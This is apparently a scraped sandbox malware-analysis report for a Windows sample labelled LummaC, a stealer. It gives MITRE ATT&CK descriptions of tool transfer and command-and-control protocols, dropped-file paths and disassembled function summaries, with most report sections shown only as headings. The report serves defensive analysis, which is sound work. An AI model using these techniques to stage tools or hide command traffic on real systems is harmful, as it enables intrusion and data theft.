Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DG55Gu1yGM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8BB0.tmp.exe_28aad63d69ff1035b1b6e3684f6f9364372fce_246ce6f4_a6630b94-fb28-40b1-8692-d2e17ab5d204\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FD6.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER90B2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER90F1.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
DG55Gu1yGM.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0212003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre